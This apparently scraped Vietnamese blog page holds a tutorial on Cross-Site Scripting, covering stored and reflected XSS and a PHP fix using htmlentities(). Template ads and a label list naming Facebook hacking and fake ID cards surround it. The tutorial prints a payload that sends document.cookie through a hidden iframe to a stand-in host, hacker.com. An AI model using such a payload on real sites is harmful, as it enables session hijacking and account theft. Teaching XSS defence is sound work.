Professional Template

Presenting Blogger Templates that are Seo, AMP HTML, Light, Fresh and Professional

  • Payment templates at Goomsite can be done via Paypal
  • Payment templates can be through Bank Rakyat Indonesia (BRI)
  • You can also get to know more closely with the goomsite admin
  • You can also contact the goomsite admin via the available contact
  • GOOMSTORE TEMPLATE


    Get the best themes in the market

    Tìm hiểu lỗ hỏng Cross-Site Scriping và cách phòng chống

    Cross-site Scripting (XSS) là lỗ hổng cho phép hacker có thể chèn những đoạn mã client-script (thường là Javascript hoặc HTML) vào trang web, khi người dùng vào những trên web này, mã độc sẽ được thực thi trên máy của người dùng.
    Khác với SQL Injection tấn công vào CSDL của website, XSS tấn công trực tiếp vào người dùng. Lợi dụng lỗi XSS, hacker có thể lừa đảo quản trị của website, ăn cắp cookie, chiếm sesion… từ đó có thể đăng nhập chiếm quyền điều khiển website.

    PHÂN LOẠI LỖI XSS

    • STORED-XSS

    Là lỗi XSS mà đoạn mã chèn thêm vào được lưu trữ trên server, như trong CSDL dưới dạng các comment trong blog, message trong forum hoặc các visitor log. Ví dụ dưới đây minh họa cho Stored-XSS. Ta có một trang web mà người dùng có thể để lại những lời nhắn như sau:

    Thay vì nhập vào lời nhắn bình thường, ta nhập vào đoạn mã sau:
    Xin <script>alert(“XSS”)</script>chào!
    Kết quả:

    Ở đây, đoạn mã <script>alert(“XSS”)</script> được chèn vào trong lời nhắn, và ngay lập tức nó được thực thi như hình trên. Vì các lời nhắn được lưu trữ trong database nên bất cứ người dùng nào khi truy cập vào trang web này sẽ thực thi đoạn mã trên. Thay vì một đoạn mã vô hại như trên, hacker có thể thay bằng các đoạn mã nguy hiểm khác nhằm gây hại đến người dùng.

    • REFLECTED-XSS:

    Khác với Stored-XSS, Reflected-XSS đoạn mã khai thác sẽ không được lưu trữ trên server. Một ví dụ điển hình của Reflected-XSS là kết quả trả về của module search:

    Ta thấy từ khóa tìm kiếm mà ta nhập vào ô textbox được hiển thị lại trên trình duyệt. Lợi dụng việc không kiểm soát giá trị này, ta có thể chèn thêm đoạn mã gây hại vào. Đường link sẽ có dạng:
    http://tek.eten.vn/xss/reflected/index.php?q=<script>alert(“XSS”)</script>

    Tuy nhiên đoạn mã độc hại không được lưu lại trên server nên chỉ khi chạy đường link trên, người dùng mới bị tấn công.
    Kịch bản điển hình nhất khi khai thác XSS là hacker chèn đoạn javascript như sau vào website:
    1<script type="text/javascript">
    2document.write("<iframe width=0 height=0
    3src=http://hacker.com/getcookie.php?cookie=",
    4document.cookie,">");
    5</script>
    Một iframe với kích thước 0×0 được chèn vào trang web và sẽ tự động load trang lấy cookie của hacker tại địa chỉ http://hacker.com/getcookie.php. Khi có được cookie, hacker có thể dễ dàng đăng nhập mà không cần biết mật khẩu của người dùng.

    PHÒNG CHỐNG

    Người ta không lường hết được mức độ nguy hiểm của XSS nhưng cũng không quá khó khăn để ngăn ngừa XSS. Giống như SQL Injection, bản chất của lỗi XSS là không kiểm soát kỹ dữ liệu nhập đầu vào, vì thế biện pháp hiệu quả nhất là kiểm tra kỹ dữ liệu nhập vào từ người dùng, chặn các từ khóa nguy hiểm, chỉ chấp nhận những dữ liệu hợp lệ.
    Một trong những cách khác hay sử dụng mà không cần kiểm soát đầu vào từ người dùng là mã hoá các kí tự đặc biệt trước khi in ra website, nhất là những gì có thể gây nguy hiểm cho người sử dụng. Ví dụ thẻ <script> sẽ được đổi thành &lt;script&gt;như vậy nó sẽ vẫn được in ra màn hình đúng định dạng mà không hề gây nguy hiểm cho người sử dụng.
    1include("../../connect.php");
    2$query "select * from message order by time desc";
    3$result = mysql_query($query);
    4$numRow = mysql_num_rows($result);
    5if ($numRow != 0){
    6 while($row = mysql_fetch_array($result))
    7 echo $row["content"];
    8}
    Ta thấy ở đoạn code trên biến $row["content"] được in trực tiếp ra mà không qua xử lý. Trường content được nhập vào từ người dùng nên đoạn code này chắc chắn có lỗi XSS. Để khắc phục ta sẽ mã hóa các ký tự đặc biệt của HTML với hàm htmlentities(). Mã nguồn được chỉnh sửa lại như sau:
    1echo htmlentities($row["content"]);
    Phương pháp này cũng có thể áp dụng với các ngôn ngữ Web khác như ASP, JSP,…

    Labels

    [Share] Code mở khóa Case bị đóng cho Unlocker Facebook - Ninja Testkey - WwW.Dothanhung.Com [Share] Web Hack Sub Không Tụt Cho Các Pro Action ảnh 3d Ảnh Bìa Ảnh Bìa Bài Hát ảnh bìa buồn và cô đơn Ảnh Bìa Chất Ảnh Bìa Cho Con Gái Ảnh Bìa Đẹp Ảnh bìa đẹp và chất ảnh bìa facebook Ảnh Bìa Facebook đẹp Ảnh Bìa Facebool anh bia lien minh huyen thoai Ảnh bìa liên minh huyền thoại anh bia lol Ảnh bìa tâm trạng Ảnh Bìa Tâm Trạng Buồn ảnh bìa tâm trạng cô đơn Ảnh Bìa Về Tình Yêu Anh Biết - Chi Dân. Ảnh bình bình yên những phút giây Ảnh Chất Ảnh Đẹp ẢNH NỀN Apps Avt Đôi avt đôi đẹp Bình yên của anh vào vài năm trước Blog Blogger Blogger Tips Buff Sub Facebook cách hack người theo dõi cách hack sub Camtasia Studio Check Pass Checkpass Facebook Chi Ân Bạn Đọc CMND Code Code mở khóa case Congnghethongtin Cover Cover Ảnh Bìa Cover Chất Đầu số cmnd Đổi tên facebook trắng Facbook Facebook facebook ma Fake CMND Faq Apps FAQ MD Game Offline GTA Hacing - IT hack sub Hack sub không tụt HACKER Hacking - IT HTML - CSS Hướng dẫn hack game rắn ăn mồi Hướng Dẫn Unlock Faq Apps It Key Phần Mềm Kết Nối Blog kiếm tiền free Kiếm tiền online Kiến thức Làm sao để lấy lại tài khoản Facebook bị hack ? Lập Trình HTML CSS Liên Minh Huyền Thoại Link contact facebook Mã Độc Marketing Facebook MMO Người âm phủ osad PC Phần Mềm Photoshop Phôi Cmnd PSD PSD Ảnh psd ảnh bìa chất PSD ảnh bìa đẹp psd ảnh bìa người âm phủ Psd ảnh bìa tâm trạng cô đơn PSD Chất PSD CMND PSD Cover PSD Đẹp Rename Facebook ma Report Facebook Share PSD Share PSD Cover Tài Liệu Photoshop Template Template Blogspot Template Chuẩn Seo Thu Thuat Thủ Thuật Thủ Thuật Blog Thủ Thuật Công Nghệ THỦ THUẬT FACEBOOK Thủ Thuật Game Tiện Ích Facebook Tips Facebook Token Facebook Token facebook free Tổng hợp các tut rip facebook Tricks Facebook Tut facebook Tut Rip tut unlock faq md 2017 Tuyển Cộng Tác Viên Unlock Checkpoint 72h Unlock Tài Khoản Veri Facebook Video Viết Chữ Gạch Ngang VPS Free Website buff sub website hỗ trợ facebook Website viplike Wind Photoshop Xóa bạn bè Xóa Tất Cả Các Lời Mời Kết Bạn Xóa TT garena Youtube

    recent posts

    tags

    [Share] Code mở khóa Case bị đóng cho Unlocker Facebook - Ninja Testkey - WwW.Dothanhung.Com [Share] Web Hack Sub Không Tụt Cho Các Pro Action ảnh 3d Ảnh Bìa Ảnh Bìa Bài Hát ảnh bìa buồn và cô đơn Ảnh Bìa Chất Ảnh Bìa Cho Con Gái Ảnh Bìa Đẹp Ảnh bìa đẹp và chất ảnh bìa facebook Ảnh Bìa Facebook đẹp Ảnh Bìa Facebool anh bia lien minh huyen thoai Ảnh bìa liên minh huyền thoại anh bia lol Ảnh bìa tâm trạng Ảnh Bìa Tâm Trạng Buồn ảnh bìa tâm trạng cô đơn Ảnh Bìa Về Tình Yêu Anh Biết - Chi Dân. Ảnh bình bình yên những phút giây Ảnh Chất Ảnh Đẹp ẢNH NỀN Apps Avt Đôi avt đôi đẹp Bình yên của anh vào vài năm trước Blog Blogger Blogger Tips Buff Sub Facebook cách hack người theo dõi cách hack sub Camtasia Studio Check Pass Checkpass Facebook Chi Ân Bạn Đọc CMND Code Code mở khóa case Congnghethongtin Cover Cover Ảnh Bìa Cover Chất Đầu số cmnd Đổi tên facebook trắng Facbook Facebook facebook ma Fake CMND Faq Apps FAQ MD Game Offline GTA Hacing - IT hack sub Hack sub không tụt HACKER Hacking - IT HTML - CSS Hướng dẫn hack game rắn ăn mồi Hướng Dẫn Unlock Faq Apps It Key Phần Mềm Kết Nối Blog kiếm tiền free Kiếm tiền online Kiến thức Làm sao để lấy lại tài khoản Facebook bị hack ? Lập Trình HTML CSS Liên Minh Huyền Thoại Link contact facebook Mã Độc Marketing Facebook MMO Người âm phủ osad PC Phần Mềm Photoshop Phôi Cmnd PSD PSD Ảnh psd ảnh bìa chất PSD ảnh bìa đẹp psd ảnh bìa người âm phủ Psd ảnh bìa tâm trạng cô đơn PSD Chất PSD CMND PSD Cover PSD Đẹp Rename Facebook ma Report Facebook Share PSD Share PSD Cover Tài Liệu Photoshop Template Template Blogspot Template Chuẩn Seo Thu Thuat Thủ Thuật Thủ Thuật Blog Thủ Thuật Công Nghệ THỦ THUẬT FACEBOOK Thủ Thuật Game Tiện Ích Facebook Tips Facebook Token Facebook Token facebook free Tổng hợp các tut rip facebook Tricks Facebook Tut facebook Tut Rip tut unlock faq md 2017 Tuyển Cộng Tác Viên Unlock Checkpoint 72h Unlock Tài Khoản Veri Facebook Video Viết Chữ Gạch Ngang VPS Free Website buff sub website hỗ trợ facebook Website viplike Wind Photoshop Xóa bạn bè Xóa Tất Cả Các Lời Mời Kết Bạn Xóa TT garena Youtube

    latest tweets

    flickr photos

    random posts

    grids

    About us

    cars

    recent posts

    random posts

    three columns

    business

    Website Hỗ Trợ

    health

    technology

    slider1

  • AMP HTML

    Document file as a support for theme settings

  • RESPONSIVE

    There are more than 1400 types of icons

  • SEO FRIENDLY

    Compatibility on all Devices such as Cellular, Tablet and Desktop

  • ADSENSE OPTIMIZED

    There are several views that support AMP HTML

  • FAST LOADING

    There are several views that support AMP HTML

  • wave

    What are they saying!


    Ainuddin Chalik

    Pemuda.org

    Saya tidak punya referensi terbaik dan nomor satu untuk sebuah kualitas dan mutu blogger template selain Goomsite.net. Bahkan saya amat sangat menyesal kenapa baru tahu Goomsite belakangan, setelah setelah sebelumnya buang-buang duit di Themeforest untuk kebutuhan yang sama tapi dengan ketersediaan template yang kualitasnya umumnya berada jauh di bawah karya powerfull Bung Basri Matindas.

    + show more - show less

    Nasrudin

    kontenmu.web.id

    Yang paling saya suka dari template dari Goomsite adalah elegan, simpel tapi mewah dan keren. Saya pakai tempalte Shezan untuk landing page bisnis saya. tampilan keren dan berkelas. nggak kelihatan kalau cuma blogspot. apalagi sekarang sudah pakai domain sendiri plus ada SSL gratis dari Google. Semoga makin sukses Bang Basri Matindas.nunc

    + show more - show less

    Kang Mus

    teknolimit.id

    Saya pengguna template Purple AMP buatan goomsite. saya sendiri rekomendasikan untuk mencoba template ini, sekitar 5 hari setelah saya buat blog dengan artikel sebanyak 5 saya daftar adsense langsung dapat full aprove dari google dan itu cuma nunggu sehari. Selain itu fitur penting seperti meta tag dan struktur datanya lengkap dan ini bisa membuat blog kalian lebih seo friendly. Terakhir, penempatan CSS sangat rapih dan mudah di modifikasi, bisa kalian lihat pada blog saya, itu hasil redesign dari template Purple AMP. Sukses selalu goomsite.

    + show more - show less

    Kiat Jitu

    kiatjitu.com

    jujur saja, saya malu mau mengataknnya, tapi mau bagaimana lagi, di web gratisan saya yang lain saya banyak memakai template buatan dari masnya, dan templatenya memang luar biasa wush... dan manteb, maunya sih saya beli, tapi sayang saya tak punya cukup banyak uang untuk membelinya. dan harapan saya, teruslah berkarya dan harumkan nama indonesia dengan karya2 mas. karena banyak orang luar nengri yang pake template yang mas buat. baik dari india thailand amerika dan inggris. biar orang luar negri pada heran kepada orang indonesia yang mana penemuan tentang template di temukan oleh orang2 sana, tapi karya mas tidak kalah dengan karya orang sana, dengan sebuah bukti banyak karya mas yang dipakai oleh orang luar negri. :)

    + show more - show less

    Want to get Attractive Offer Info?

    Enter your email and get the latest info from us

    Copyright © 2019 - Goomsite.Net